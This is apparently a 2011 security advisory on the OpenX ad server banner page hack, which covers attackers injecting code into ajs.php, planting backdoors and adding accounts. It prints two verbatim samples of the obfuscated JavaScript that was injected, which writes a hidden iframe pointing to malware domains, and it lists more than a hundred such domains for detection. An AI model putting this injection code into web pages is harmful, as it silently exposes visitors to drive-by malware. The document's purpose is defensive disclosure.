OpenX Banner Page Hack
Updated: November 4, 2011
The OpenX banner page hack places a malicious JavaScript or Iframe into the banner page (/www/delivery/ajs.php) produced by an OpenX ad server. This is sometimes accomplished with a plugin and in other cases the code is injected into the OpenX database. In some cases the hackers have inserted backdoor scripts, which allow the hacker to remote access to the ad server, into some of the hacked ad servers. Also, in some cases hacker have added additional user accounts to the ad server.
It is possible that ad servers running up to version 2.8.7 as vulnerable (check what version you are currently running), as OpenX warns that 2.8.7 "might be vulnerable to certain attacks and is probably not secure.". Previously, OpenX had announced that they patched an undisclosed vulnerability in version 2.8.7, they also have a post with advice on cleaning up after a hack that takes advantage of this. A previous hack infected ad servers in December of 2009 and was patched in version 2.8.3
Recent Code In Append Field:
<script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){
function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}
if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}
if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\"text/javascript\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://vrominet.com/ry081q2d52c.php?s=IBB@G\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'></ifra'+'me>');");dc.writeln("//--><\/script>");} var run=1;
date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
Recent Script Format:
if(typeof run == \'undefined\'){dc.writeln(\"<"+"script type=\\\"text/javascript\\\"><"+"!--\");dc.writeln(\"var host=\' widt\'+\'h=1 h\'+\'eight\'+\'=1 \'; var src=\'src=\'; var brdr=\'fra\'+\'mebor\'+\'der=\'+\'0\';var sc=\'\\\"http://frentomst.com/xp/index.php?s=IBB@G\\\" \';\");dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+src+sc+brdr+\'\\\"><"+"/ifra\'+\'me>\');\");dc.writeln(\"//--><"+"\\/script>\");} var run=1;\n
Recent Malware Domains: blamesslek.com, sircic.com, sirjm.com, asirq.com, cnjug.com, blamesllek.com, bikleman.com, oplayerst.com, kovertums.com, pouiverton.com, frentomst.com, quintivolt.com, opperlant.com, priztersmon.com, polotren.com, juitwell.com, blivvsen.com, biltermos.com, livertip.com, voxinghelt.com, helstrijt.com, binreskolt.com, jewertlins.com, pinterrot.com, voxinghlet.com, noixols.com, kolinrt.com, pceriozc.com, ziniosca.com, serwinlk.com, plizzerc.com, qerwill.com, oltinder.com, pllistrev.com, nowelrsa.com, volintrex.com, esitolvarx.com, xezolpent.com, vionterxz.com, volinsat.com, opletrin.com, opertyvaz.com, lakeltis.com, xepzart.com, aseoplent.com, sedralion.com, ointyrlez.com, exleftt.com, apolint.com, becerinklot.com, evretsan.com, olpentrin.com, solinberitt.com, inubuts.com, ploztex.com, azopnet.com, jablesst.com, bkbbkab.co.cc, inerbazt.com, restybl.com, werusna.com, seberfalm.com, wliontreh.com, bkbkzbk.co.cc, cerbingh.com, bultropas.com, oplandus.com, bovonkls.com, vermuzby.com, efertyon.com, noislotik.com, vuntrempy.com, empyrtemp.com, ubinseros.com, vokomatry.com, uberfalsz.com, culsis.com, basesis.com, culassure.com, optima68.ipq.co, susiwong.com, clickme10.ipq.co, globax668.ipq.co, isanghyun.com, yenguide.com, mykasker.com, ahkertson.com, vrominet.com, opiontol.com, ahsontul.com, mutterfas.com, zeversans.com, leofloter.com, binoquils.com, mleoziber.com, ensortlem.com, finremtsog.com, unjaysmilf.com, forminteld.com, nolemoitos.com, enbindeft.com, ulumagherm.com, zvidterms.com, zibendelt.com, unoghoster.com, smerftond.com, unglebdirt.com, finofalts.com, bringodel.com, parti03.co.cc, parti38.co.cc, parti01.co.cc, frepogolt.com, asperfalt.com
